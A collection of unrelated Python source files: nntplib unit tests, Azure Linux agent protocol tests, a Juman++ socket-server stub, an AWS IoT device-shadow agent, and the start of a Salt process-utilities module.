'LIST': ['ACTIVE', 'ACTIVE.TIMES', 'DISTRIB.PATS',
'HEADERS', 'NEWSGROUPS', 'OVERVIEW.FMT'],
'OVER': [],
'POST': [],
'READER': [],
})
self.assertEqual(self.server.nntp_version, 3)
self.assertEqual(self.server.nntp_implementation, 'INN 2.5.1')
class CapsAfterLoginNNTPv2Tests(MockedNNTPTestsMixin, unittest.TestCase):
"""Tests a probably NNTP v2 server with capabilities only after login."""
nntp_version = 2
handler_class = CapsAfterLoginNNTPv2Handler
def test_caps_only_after_login(self):
self.assertEqual(self.server._caps, {})
self.server.login('testuser', 'testpw')
self.assertIn('VERSION', self.server._caps)
class SendReaderNNTPv2Tests(MockedNNTPWithReaderModeMixin,
unittest.TestCase):
"""Same tests as for v2 but we tell NTTP to send MODE READER to a server
that isn't in READER mode by default."""
nntp_version = 2
handler_class = ModeSwitchingNNTPv2Handler
def test_we_are_in_reader_mode_after_connect(self):
self.assertIn('READER', self.server._caps)
class MiscTests(unittest.TestCase):
def test_decode_header(self):
def gives(a, b):
self.assertEqual(nntplib.decode_header(a), b)
gives("" , "")
gives("a plain header", "a plain header")
gives(" with extra spaces ", " with extra spaces ")
gives("=?ISO-8859-15?Q?D=E9buter_en_Python?=", "Débuter en Python")
gives("=?utf-8?q?Re=3A_=5Bsqlite=5D_probl=C3=A8me_avec_ORDER_BY_sur_des_cha?="
" =?utf-8?q?=C3=AEnes_de_caract=C3=A8res_accentu=C3=A9es?=",
"Re: [sqlite] problème avec ORDER BY sur des chaînes de caractères accentuées")
gives("Re: =?UTF-8?B?cHJvYmzDqG1lIGRlIG1hdHJpY2U=?=",
"Re: problème de matrice")
# A natively utf-8 header (found in the real world!)
gives("Re: Message d'erreur incompréhensible (par moi)",
"Re: Message d'erreur incompréhensible (par moi)")
def test_parse_overview_fmt(self):
# The minimal (default) response
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", ":bytes", ":lines"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines"])
# The minimal response using alternative names
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", "Bytes:", "Lines:"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines"])
# Variations in casing
lines = ["subject:", "FROM:", "DaTe:", "message-ID:",
"References:", "BYTES:", "Lines:"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines"])
# First example from RFC 3977
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", ":bytes", ":lines", "Xref:full",
"Distribution:full"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines", "xref", "distribution"])
# Second example from RFC 3977
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", "Bytes:", "Lines:", "Xref:FULL",
"Distribution:FULL"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines", "xref", "distribution"])
# A classic response from INN
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", "Bytes:", "Lines:", "Xref:full"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines", "xref"])
def test_parse_overview(self):
fmt = nntplib._DEFAULT_OVERVIEW_FMT + ["xref"]
# First example from RFC 3977
lines = [
'3000234\tI am just a test article\t"Demo User" '
'<nobody@example.com>\t6 Oct 1998 04:38:40 -0500\t'
'<45223423@example.com>\t<45454@example.net>\t1234\t'
'17\tXref: news.example.com misc.test:3000363',
]
overview = nntplib._parse_overview(lines, fmt)
(art_num, fields), = overview
self.assertEqual(art_num, 3000234)
self.assertEqual(fields, {
'subject': 'I am just a test article',
'from': '"Demo User" <nobody@example.com>',
'date': '6 Oct 1998 04:38:40 -0500',
'message-id': '<45223423@example.com>',
'references': '<45454@example.net>',
':bytes': '1234',
':lines': '17',
'xref': 'news.example.com misc.test:3000363',
})
# Second example; here the "Xref" field is totally absent (including
# the header name) and comes out as None
lines = [
'3000234\tI am just a test article\t"Demo User" '
'<nobody@example.com>\t6 Oct 1998 04:38:40 -0500\t'
'<45223423@example.com>\t<45454@example.net>\t1234\t'
'17\t\t',
]
overview = nntplib._parse_overview(lines, fmt)
(art_num, fields), = overview
self.assertEqual(fields['xref'], None)
# Third example; the "Xref" is an empty string, while "references"
# is a single space.
lines = [
'3000234\tI am just a test article\t"Demo User" '
'<nobody@example.com>\t6 Oct 1998 04:38:40 -0500\t'
'<45223423@example.com>\t \t1234\t'
'17\tXref: \t',
]
overview = nntplib._parse_overview(lines, fmt)
(art_num, fields), = overview
self.assertEqual(fields['references'], ' ')
self.assertEqual(fields['xref'], '')
def test_parse_datetime(self):
def gives(a, b, *c):
self.assertEqual(nntplib._parse_datetime(a, b),
datetime.datetime(*c))
# Output of DATE command
gives("19990623135624", None, 1999, 6, 23, 13, 56, 24)
# Variations
gives("19990623", "135624", 1999, 6, 23, 13, 56, 24)
gives("990623", "135624", 1999, 6, 23, 13, 56, 24)
gives("090623", "135624", 2009, 6, 23, 13, 56, 24)
def test_unparse_datetime(self):
# Test non-legacy mode
# 1) with a datetime
def gives(y, M, d, h, m, s, date_str, time_str):
dt = datetime.datetime(y, M, d, h, m, s)
self.assertEqual(nntplib._unparse_datetime(dt),
(date_str, time_str))
self.assertEqual(nntplib._unparse_datetime(dt, False),
(date_str, time_str))
gives(1999, 6, 23, 13, 56, 24, "19990623", "135624")
gives(2000, 6, 23, 13, 56, 24, "20000623", "135624")
gives(2010, 6, 5, 1, 2, 3, "20100605", "010203")
# 2) with a date
def gives(y, M, d, date_str, time_str):
dt = datetime.date(y, M, d)
self.assertEqual(nntplib._unparse_datetime(dt),
(date_str, time_str))
self.assertEqual(nntplib._unparse_datetime(dt, False),
(date_str, time_str))
gives(1999, 6, 23, "19990623", "000000")
gives(2000, 6, 23, "20000623", "000000")
gives(2010, 6, 5, "20100605", "000000")
def test_unparse_datetime_legacy(self):
# Test legacy mode (RFC 977)
# 1) with a datetime
def gives(y, M, d, h, m, s, date_str, time_str):
dt = datetime.datetime(y, M, d, h, m, s)
self.assertEqual(nntplib._unparse_datetime(dt, True),
(date_str, time_str))
gives(1999, 6, 23, 13, 56, 24, "990623", "135624")
gives(2000, 6, 23, 13, 56, 24, "000623", "135624")
gives(2010, 6, 5, 1, 2, 3, "100605", "010203")
# 2) with a date
def gives(y, M, d, date_str, time_str):
dt = datetime.date(y, M, d)
self.assertEqual(nntplib._unparse_datetime(dt, True),
(date_str, time_str))
gives(1999, 6, 23, "990623", "000000")
gives(2000, 6, 23, "000623", "000000")
gives(2010, 6, 5, "100605", "000000")
@unittest.skipUnless(ssl, 'requires SSL support')
def test_ssl_support(self):
self.assertTrue(hasattr(nntplib, 'NNTP_SSL'))
class PublicAPITests(unittest.TestCase):
"""Ensures that the correct values are exposed in the public API."""
def test_module_all_attribute(self):
self.assertTrue(hasattr(nntplib, '__all__'))
target_api = ['NNTP', 'NNTPError', 'NNTPReplyError',
'NNTPTemporaryError', 'NNTPPermanentError',
'NNTPProtocolError', 'NNTPDataError', 'decode_header']
if ssl is not None:
target_api.append('NNTP_SSL')
self.assertEqual(set(nntplib.__all__), set(target_api))
class MockSocketTests(unittest.TestCase):
"""Tests involving a mock socket object
Used where the _NNTPServerIO file object is not enough."""
nntp_class = nntplib.NNTP
def check_constructor_error_conditions(
self, handler_class,
expected_error_type, expected_error_msg,
login=None, password=None):
class mock_socket_module:
def create_connection(address, timeout):
return MockSocket()
class MockSocket:
def close(self):
nonlocal socket_closed
socket_closed = True
def makefile(socket, mode):
handler = handler_class()
_, file = make_mock_file(handler)
files.append(file)
return file
socket_closed = False
files = []
with patch('nntplib.socket', mock_socket_module), \
self.assertRaisesRegex(expected_error_type, expected_error_msg):
self.nntp_class('dummy', user=login, password=password)
self.assertTrue(socket_closed)
for f in files:
self.assertTrue(f.closed)
def test_bad_welcome(self):
#Test a bad welcome message
class Handler(NNTPv1Handler):
welcome = 'Bad Welcome'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPProtocolError, Handler.welcome)
def test_service_temporarily_unavailable(self):
#Test service temporarily unavailable
class Handler(NNTPv1Handler):
welcome = '400 Service temporarily unavailable'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPTemporaryError, Handler.welcome)
def test_service_permanently_unavailable(self):
#Test service permanently unavailable
class Handler(NNTPv1Handler):
welcome = '502 Service permanently unavailable'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPPermanentError, Handler.welcome)
def test_bad_capabilities(self):
#Test a bad capabilities response
class Handler(NNTPv1Handler):
def handle_CAPABILITIES(self):
self.push_lit(capabilities_response)
capabilities_response = '201 bad capability'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPReplyError, capabilities_response)
def test_login_aborted(self):
#Test a bad authinfo response
login = 't@e.com'
password = 'python'
class Handler(NNTPv1Handler):
def handle_AUTHINFO(self, *args):
self.push_lit(authinfo_response)
authinfo_response = '503 Mechanism not recognized'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPPermanentError, authinfo_response,
login, password)
class bypass_context:
"""Bypass encryption and actual SSL module"""
def wrap_socket(sock, **args):
return sock
@unittest.skipUnless(ssl, 'requires SSL support')
class MockSslTests(MockSocketTests):
@staticmethod
def nntp_class(*pos, **kw):
return nntplib.NNTP_SSL(*pos, ssl_context=bypass_context, **kw)
class LocalServerTests(unittest.TestCase):
def setUp(self):
sock = socket.socket()
port = socket_helper.bind_port(sock)
sock.listen()
self.background = threading.Thread(
target=self.run_server, args=(sock,))
self.background.start()
self.addCleanup(self.background.join)
self.nntp = NNTP(socket_helper.HOST, port, usenetrc=False).__enter__()
self.addCleanup(self.nntp.__exit__, None, None, None)
def run_server(self, sock):
# Could be generalized to handle more commands in separate methods
with sock:
[client, _] = sock.accept()
with contextlib.ExitStack() as cleanup:
cleanup.enter_context(client)
reader = cleanup.enter_context(client.makefile('rb'))
client.sendall(b'200 Server ready\r\n')
while True:
cmd = reader.readline()
if cmd == b'CAPABILITIES\r\n':
client.sendall(
b'101 Capability list:\r\n'
b'VERSION 2\r\n'
b'STARTTLS\r\n'
b'.\r\n'
)
elif cmd == b'STARTTLS\r\n':
reader.close()
client.sendall(b'382 Begin TLS negotiation now\r\n')
context = ssl.SSLContext()
context.load_cert_chain(certfile)
client = context.wrap_socket(
client, server_side=True)
cleanup.enter_context(client)
reader = cleanup.enter_context(client.makefile('rb'))
elif cmd == b'QUIT\r\n':
client.sendall(b'205 Bye!\r\n')
break
else:
raise ValueError('Unexpected command {!r}'.format(cmd))
@unittest.skipUnless(ssl, 'requires SSL support')
def test_starttls(self):
file = self.nntp.file
sock = self.nntp.sock
self.nntp.starttls()
# Check that the socket and internal pseudo-file really were
# changed.
self.assertNotEqual(file, self.nntp.file)
self.assertNotEqual(sock, self.nntp.sock)
# Check that the new socket really is an SSL one
self.assertIsInstance(self.nntp.sock, ssl.SSLSocket)
# Check that trying starttls when it's already active fails.
self.assertRaises(ValueError, self.nntp.starttls)
if __name__ == "__main__":
unittest.main()
|
test_protocol_util.py
|
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import unittest
import os
import tempfile
from multiprocessing import Queue
from threading import Thread
from tests.tools import AgentTestCase, MagicMock, Mock, patch, clear_singleton_instances
from azurelinuxagent.common.exception import *
from azurelinuxagent.common.protocol.metadata_server_migration_util import _METADATA_PROTOCOL_NAME, \
_LEGACY_METADATA_SERVER_TRANSPORT_PRV_FILE_NAME, \
_LEGACY_METADATA_SERVER_TRANSPORT_CERT_FILE_NAME, \
_LEGACY_METADATA_SERVER_P7B_FILE_NAME
from azurelinuxagent.common.protocol.goal_state import TRANSPORT_CERT_FILE_NAME, TRANSPORT_PRV_FILE_NAME
from azurelinuxagent.common.protocol.util import get_protocol_util, ProtocolUtil, PROTOCOL_FILE_NAME, WIRE_PROTOCOL_NAME, ENDPOINT_FILE_NAME
from azurelinuxagent.common.utils.restutil import KNOWN_WIRESERVER_IP
from errno import ENOENT
@patch("time.sleep")
class TestProtocolUtil(AgentTestCase):
MDS_CERTIFICATES = [_LEGACY_METADATA_SERVER_TRANSPORT_PRV_FILE_NAME, \
_LEGACY_METADATA_SERVER_TRANSPORT_CERT_FILE_NAME, \
_LEGACY_METADATA_SERVER_P7B_FILE_NAME]
WIRESERVER_CERTIFICATES = [TRANSPORT_CERT_FILE_NAME, TRANSPORT_PRV_FILE_NAME]
def setUp(self):
super(TestProtocolUtil, self).setUp()
# Since ProtocolUtil is a singleton per thread, we need to clear it to ensure that the test cases do not
# reuse a previous state
clear_singleton_instances(ProtocolUtil)
# Cleanup certificate files, protocol file, and endpoint files
def tearDown(self):
dir = tempfile.gettempdir()
for path in [os.path.join(dir, mds_cert) for mds_cert in TestProtocolUtil.MDS_CERTIFICATES]:
if os.path.exists(path):
os.remove(path)
for path in [os.path.join(dir, ws_cert) for ws_cert in TestProtocolUtil.WIRESERVER_CERTIFICATES]:
if os.path.exists(path):
os.remove(path)
protocol_path = os.path.join(dir, PROTOCOL_FILE_NAME)
if os.path.exists(protocol_path):
os.remove(protocol_path)
endpoint_path = os.path.join(dir, ENDPOINT_FILE_NAME)
if os.path.exists(endpoint_path):
os.remove(endpoint_path)
def test_get_protocol_util_should_return_same_object_for_same_thread(self, _):
protocol_util1 = get_protocol_util()
protocol_util2 = get_protocol_util()
self.assertEqual(protocol_util1, protocol_util2)
def test_get_protocol_util_should_return_different_object_for_different_thread(self, _):
protocol_util_instances = []
errors = []
def get_protocol_util_instance():
try:
protocol_util_instances.append(get_protocol_util())
except Exception as e:
errors.append(e)
t1 = Thread(target=get_protocol_util_instance)
t2 = Thread(target=get_protocol_util_instance)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(len(protocol_util_instances), 2, "Could not create the expected number of protocols. Errors: [{0}]".format(errors))
self.assertNotEqual(protocol_util_instances[0], protocol_util_instances[1], "The instances created by different threads should be different")
@patch("azurelinuxagent.common.protocol.util.WireProtocol")
def test_detect_protocol(self, WireProtocol, _):
WireProtocol.return_value = MagicMock()
protocol_util = get_protocol_util()
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = "foo.bar"
# Test wire protocol is available
protocol = protocol_util.get_protocol()
self.assertEquals(WireProtocol.return_value, protocol)
# Test wire protocol is not available
protocol_util.clear_protocol()
WireProtocol.return_value.detect.side_effect = ProtocolError()
self.assertRaises(ProtocolError, protocol_util.get_protocol)
@patch("azurelinuxagent.common.conf.get_lib_dir")
@patch("azurelinuxagent.common.protocol.util.WireProtocol")
def test_detect_protocol_no_dhcp(self, WireProtocol, mock_get_lib_dir, _):
WireProtocol.return_value.detect = Mock()
mock_get_lib_dir.return_value = self.tmp_dir
protocol_util = get_protocol_util()
protocol_util.osutil = MagicMock()
protocol_util.osutil.is_dhcp_available.return_value = False
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = None
protocol_util.dhcp_handler.run = Mock()
endpoint_file = protocol_util._get_wireserver_endpoint_file_path()
# Test wire protocol when no endpoint file has been written
protocol_util._detect_protocol()
self.assertEqual(KNOWN_WIRESERVER_IP, protocol_util.get_wireserver_endpoint())
# Test wire protocol on dhcp failure
protocol_util.osutil.is_dhcp_available.return_value = True
protocol_util.dhcp_handler.run.side_effect = DhcpError()
self.assertRaises(ProtocolError, protocol_util._detect_protocol)
@patch("azurelinuxagent.common.protocol.util.WireProtocol")
def test_get_protocol(self, WireProtocol, _):
WireProtocol.return_value = MagicMock()
protocol_util = get_protocol_util()
protocol_util.get_wireserver_endpoint = Mock()
protocol_util._detect_protocol = MagicMock()
protocol_util._save_protocol("WireProtocol")
protocol = protocol_util.get_protocol()
self.assertEquals(WireProtocol.return_value, protocol)
protocol_util.get_wireserver_endpoint.assert_any_call()
@patch('azurelinuxagent.common.conf.get_lib_dir')
@patch('azurelinuxagent.common.conf.enable_firewall')
def test_get_protocol_wireserver_to_wireserver_update_removes_metadataserver_artifacts(self, mock_enable_firewall, mock_get_lib_dir, _):
"""
This is for testing that agent upgrade from WireServer to WireServer protocol
will clean up leftover MDS Certificates (from a previous Metadata Server to Wireserver
update, intermediate updated agent does not clean up MDS certificates) and reset firewall rules.
We don't test that WireServer certificates, protocol file, or endpoint file were created
because we already expect them to be created since we are updating from a WireServer agent.
"""
# Setup Protocol file with WireProtocol
dir = tempfile.gettempdir()
filename = os.path.join(dir, PROTOCOL_FILE_NAME)
with open(filename, "w") as f:
f.write(WIRE_PROTOCOL_NAME)
# Setup MDS Certificates
mds_cert_paths = [os.path.join(dir, mds_cert) for mds_cert in TestProtocolUtil.MDS_CERTIFICATES]
for mds_cert_path in mds_cert_paths:
open(mds_cert_path, "w").close()
# Setup mocks
mock_get_lib_dir.return_value = dir
mock_enable_firewall.return_value = True
protocol_util = get_protocol_util()
protocol_util.osutil = MagicMock()
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = KNOWN_WIRESERVER_IP
# Run
protocol_util.get_protocol()
# Check MDS Certs do not exist
for mds_cert_path in mds_cert_paths:
self.assertFalse(os.path.exists(mds_cert_path))
# Check firewall rules was reset
protocol_util.osutil.remove_rules_files.assert_called_once()
protocol_util.osutil.remove_firewall.assert_called_once()
protocol_util.osutil.enable_firewall.assert_called_once()
@patch('azurelinuxagent.common.conf.get_lib_dir')
@patch('azurelinuxagent.common.conf.enable_firewall')
@patch('azurelinuxagent.common.protocol.wire.WireClient')
def test_get_protocol_metadataserver_to_wireserver_update_removes_metadataserver_artifacts(self, mock_wire_client, mock_enable_firewall, mock_get_lib_dir, _):
"""
This is for testing that agent upgrade from MetadataServer to WireServer protocol
will clean up leftover MDS Certificates and reset firewall rules. Also check that
WireServer certificates are present, and protocol/endpoint files are written to appropriately.
"""
# Setup Protocol file with MetadataProtocol
dir = tempfile.gettempdir()
protocol_filename = os.path.join(dir, PROTOCOL_FILE_NAME)
with open(protocol_filename, "w") as f:
f.write(_METADATA_PROTOCOL_NAME)
# Setup MDS Certificates
mds_cert_paths = [os.path.join(dir, mds_cert) for mds_cert in TestProtocolUtil.MDS_CERTIFICATES]
for mds_cert_path in mds_cert_paths:
open(mds_cert_path, "w").close()
# Setup mocks
mock_get_lib_dir.return_value = dir
mock_enable_firewall.return_value = True
protocol_util = get_protocol_util()
protocol_util.osutil = MagicMock()
mock_wire_client.return_value = MagicMock()
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = KNOWN_WIRESERVER_IP
# Run
protocol_util.get_protocol()
# Check MDS Certs do not exist
for mds_cert_path in mds_cert_paths:
self.assertFalse(os.path.exists(mds_cert_path))
# Check that WireServer Certs exist
ws_cert_paths = [os.path.join(dir, ws_cert) for ws_cert in TestProtocolUtil.WIRESERVER_CERTIFICATES]
for ws_cert_path in ws_cert_paths:
self.assertTrue(os.path.isfile(ws_cert_path))
# Check firewall rules was reset
protocol_util.osutil.remove_rules_files.assert_called_once()
protocol_util.osutil.remove_firewall.assert_called_once()
protocol_util.osutil.enable_firewall.assert_called_once()
# Check Protocol File is updated to WireProtocol
with open(os.path.join(dir, PROTOCOL_FILE_NAME), "r") as f:
self.assertEquals(f.read(), WIRE_PROTOCOL_NAME)
# Check Endpoint file is updated to WireServer IP
with open(os.path.join(dir, ENDPOINT_FILE_NAME), 'r') as f:
self.assertEquals(f.read(), KNOWN_WIRESERVER_IP)
@patch('azurelinuxagent.common.conf.get_lib_dir')
@patch('azurelinuxagent.common.conf.enable_firewall')
@patch('azurelinuxagent.common.protocol.wire.WireClient')
def test_get_protocol_new_wireserver_agent_generates_certificates(self, mock_wire_client, mock_enable_firewall, mock_get_lib_dir, _):
"""
This is for testing that a new WireServer Linux Agent generates appropriate certificates,
protocol file, and endpoint file.
"""
# Setup mocks
dir = tempfile.gettempdir()
mock_get_lib_dir.return_value = dir
mock_enable_firewall.return_value = True
protocol_util = get_protocol_util()
protocol_util.osutil = MagicMock()
mock_wire_client.return_value = MagicMock()
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = KNOWN_WIRESERVER_IP
# Run
protocol_util.get_protocol()
# Check that WireServer Certs exist
ws_cert_paths = [os.path.join(dir, ws_cert) for ws_cert in TestProtocolUtil.WIRESERVER_CERTIFICATES]
for ws_cert_path in ws_cert_paths:
self.assertTrue(os.path.isfile(ws_cert_path))
# Check firewall rules were not reset
protocol_util.osutil.remove_rules_files.assert_not_called()
protocol_util.osutil.remove_firewall.assert_not_called()
protocol_util.osutil.enable_firewall.assert_not_called()
# Check Protocol File is updated to WireProtocol
with open(os.path.join(dir, PROTOCOL_FILE_NAME), "r") as f:
self.assertEquals(f.read(), WIRE_PROTOCOL_NAME)
# Check Endpoint file is updated to WireServer IP
with open(os.path.join(dir, ENDPOINT_FILE_NAME), 'r') as f:
self.assertEquals(f.read(), KNOWN_WIRESERVER_IP)
@patch("azurelinuxagent.common.utils.fileutil")
@patch("azurelinuxagent.common.conf.get_lib_dir")
def test_endpoint_file_states(self, mock_get_lib_dir, mock_fileutil, _):
mock_get_lib_dir.return_value = self.tmp_dir
mock_fileutil = MagicMock()
protocol_util = get_protocol_util()
endpoint_file = protocol_util._get_wireserver_endpoint_file_path()
# Test get endpoint for io error
mock_fileutil.read_file.side_effect = IOError()
ep = protocol_util.get_wireserver_endpoint()
self.assertEquals(ep, KNOWN_WIRESERVER_IP)
# Test get endpoint when file not found
mock_fileutil.read_file.side_effect = IOError(ENOENT, 'File not found')
ep = protocol_util.get_wireserver_endpoint()
self.assertEquals(ep, KNOWN_WIRESERVER_IP)
# Test get endpoint for empty file
mock_fileutil.read_file.return_value = ""
ep = protocol_util.get_wireserver_endpoint()
self.assertEquals(ep, KNOWN_WIRESERVER_IP)
# Test set endpoint for io error
mock_fileutil.write_file.side_effect = IOError()
ep = protocol_util.get_wireserver_endpoint()
self.assertRaises(OSUtilError, protocol_util._set_wireserver_endpoint('abc'))
# Test clear endpoint for io error
with open(endpoint_file, "w+") as ep_fd:
ep_fd.write("")
with patch('os.remove') as mock_remove:
protocol_util._clear_wireserver_endpoint()
self.assertEqual(1, mock_remove.call_count)
self.assertEqual(endpoint_file, mock_remove.call_args_list[0][0][0])
# Test clear endpoint when file not found
with patch('os.remove') as mock_remove:
mock_remove = Mock(side_effect=IOError(ENOENT, 'File not found'))
protocol_util._clear_wireserver_endpoint()
mock_remove.assert_not_called()
def test_protocol_file_states(self, _):
protocol_util = get_protocol_util()
protocol_util._clear_wireserver_endpoint = Mock()
protocol_file = protocol_util._get_protocol_file_path()
# Test clear protocol for io error
with open(protocol_file, "w+") as proto_fd:
proto_fd.write("")
with patch('os.remove') as mock_remove:
protocol_util.clear_protocol()
self.assertEqual(1, protocol_util._clear_wireserver_endpoint.call_count)
self.assertEqual(1, mock_remove.call_count)
self.assertEqual(protocol_file, mock_remove.call_args_list[0][0][0])
# Test clear protocol when file not found
protocol_util._clear_wireserver_endpoint.reset_mock()
with patch('os.remove') as mock_remove:
protocol_util.clear_protocol()
self.assertEqual(1, protocol_util._clear_wireserver_endpoint.call_count)
self.assertEqual(1, mock_remove.call_count)
self.assertEqual(protocol_file, mock_remove.call_args_list[0][0][0])
if __name__ == '__main__':
unittest.main()
|
jumanpp.py
|
import argparse
import logging
import socketserver
import subprocess
from multiprocessing import Process
def main():
logger = logging.getLogger(__name__)
parser = _mk_argparser(logger=logger)
args = parser.parse_arg()
pass
def _mk_argparser(*, logger=None):
logger = logger or logging.getLogger(__name__)
parser = argparse.ArgumentParser(description="Server mode of juman++")
parser.add_argument('-c', '--cmd',
action='store',
default='jumanpp',
type=str,
help='which jumanpp cmd')
parser.parser.add_argument('-p', '--port',
action='store',
default=12000,
type=int,
help='port number to open')
return parser
class ExecuteDaemon:
def __init__(self, cmdl, *, logger=None, **prs_args):
self.cmdl = cmdl
self.prs_args = prs_args
self.logger = logger or logging.getLogger("ExecuteDaemon")
self.start()
def start(self):
self.popen = subprocess.Popen(*self.cmdl,
encoding='utf-8',
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
**self.prs_args)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def close(self):
self.popen.stdin.close()
def receive(self):
self.popen.stdout.flush()
return self.popen.stdout.read()
class JumanppRequestHandler(socketserver.StreamRequestHandler):
def __init__(self, request, client_address, server, *, logger=None):
self._logger = logging.getLogger('JumanppRequestHandler')
self._logger.debug('__init__')
super().__init__(request, client_address, server)
def setup(self):
self._logger.debug('setup')
return super().setup()
def handle(self):
self._logger.debug('handle')
data = self.rfile.readline()
self._logger.debug('recv()->"%s"', data)
self.request.send(data)
def finish(self):
self._logger.debug('finish')
return super().finish()
def _jumanpp_process():
pass
class JumanppServer(socketserver.ForkingMixIn, socketserver.TCPServer):
"""
Juman++のサーバとして動作するクラス
"""
def __init__(self, server_address, handler_class, *, logger=None):
self._logger = logger or logging.getLogger('JumnappServer')
self._logger.debug('init')
super().__init__(server_address, handler_class)
self._logger.info('started jumanpp server')
def server_activate(self):
self._logger.info('server activated')
super().server_activate()
def serve_forever(self):
self._logger.debug('waiting for request')
self._logger.info('Handling requests, press <Ctrl-C> to quit')
while True:
self.handle_request()
return
def handle_request(self):
self._logger.debug('handle_request')
return super().handle_request()
def verify_request(self, request, client_address):
self._logger.debug('verify_request(%s, %s)', request, client_address)
return super().verify_request(request, client_address)
def process_request(self, request, client_address):
self._logger.debug('process_request(%s, %s)', request, client_address)
return super().process_request(request, client_address)
def server_close(self):
self._logger.debug('server_close')
return super().server_close()
def finish_request(self, request, client_address):
self._logger.debug('finish_request(%s, %s)', request, client_address)
return super().finish_request(request, client_address)
def close_request(self, request_address):
self._logger.debug('close_request(%s)', request_address)
return super().close_request(request_address)
def test():
import socket
import threading
import os
address = ('localhost', 0) # カーネルにポート番号を割り当てさせる
server = JumanppServer(address, JumanppRequestHandler)
ip, port = server.server_address # 与えられたポート番号を調べる
t = threading.Thread(target=server.serve_forever)
t.setDaemon(True) # 終了時にハングアップしない
t.start()
print('Server loop running in process:', os.getpid())
# サーバへ接続する
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
# データを送る
message = 'Hello, world'
print('Sending : "%s"' % message)
len_sent = s.send(message.encode())
# レスポンスを受けとる
response = s.recv(1024)
print('Received: "%s"' % response)
# クリーンアップ
s.close()
server.socket.close()
|
duploiotagent.py
|
from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient
import logging
import time
import sys
import traceback
import argparse
import os
import json
import requests
import socket
import boto3
import datetime
from threading import Thread
import basicPubSub
from dockerutils import processGoalState
from dockerutils import getContainersJson
g_deviceid = ""
def invokePubSub():
global g_deviceid
while(True):
try:
lAwsMQTTClient, ltopic, g_deviceid = basicPubSub.pubSubGetClient()
print("++++++++ Device ID is {}".format(g_deviceid))
basicPubSub.startPubSub(lAwsMQTTClient, ltopic)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
el = repr(traceback.format_exception(exc_type, exc_value, exc_traceback))
print('pubsub threw an error {}'.format(el))
time.sleep(10)
def getDeviceShadow():
global g_deviceid
try:
client = boto3.client('iot-data', region_name='us-west-2')
response = client.get_thing_shadow(thingName=g_deviceid)
streamingBody = response["payload"]
data = json.loads(streamingBody.read())
#formattedData = json.dumps(data["state"]["desired"], indent=4, sort_keys=True)
#print(formattedData)
processGoalState(data["state"]["desired"])
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
el = repr(traceback.format_exception(exc_type, exc_value, exc_traceback))
print('getDeviceShadow threw an error {}'.format(el))
def updateDeviceShadow():
global g_deviceid
try:
lData = getContainersJson()
lJsonObj = json.loads(lData)
lHostName = os.getenv('HOST_HOSTNAME', socket.gethostname())
d = datetime.datetime.utcnow()
status = '{ "ReportedAt":"' + d.isoformat() + '", "Containers":' + json.dumps(lJsonObj) + ' }'
status = '{ "reported":' + status + ' }'
status = '{ "state":' + status + ' }'
lJsonObj = json.loads(status)
print(json.dumps(lJsonObj))
client = boto3.client('iot-data', region_name='us-west-2')
response = client.update_thing_shadow(thingName=g_deviceid, payload=json.dumps(lJsonObj))
print('Updated Device Shadow')
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
el = repr(traceback.format_exception(exc_type, exc_value, exc_traceback))
print('updateDeviceShadow threw an error {}'.format(el))
if __name__ == '__main__':
print('Launching pubsub thread')
lPubSubthrd = Thread(target = invokePubSub, args = [])
lPubSubthrd.setDaemon(True)
lPubSubthrd.start()
while(True):
time.sleep(12)
print("++++++++ Device ID is {}".format(g_deviceid))
getDeviceShadow()
print("++++++++ Device ID is {}".format(g_deviceid))
updateDeviceShadow()
|
process.py
|
# -*- coding: utf-8 -*-
'''
Functions for daemonizing and otherwise modifying running processes
'''
# Import python libs
from __future__ import absolute_import, with_statement, print_function, unicode_literals
import copy
import os
import sys
import time
import errno
import types
import signal
import logging
import threading
import contextlib
import subprocess
import multiprocessing
import multiprocessing.util
import socket
# Import salt libs
import salt.defaults.exitcodes
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.log.setup
import salt.defaults.exitcodes
from salt.log.mixins import NewStyleClassMixIn
# Import 3rd-party libs
from salt.ext import six
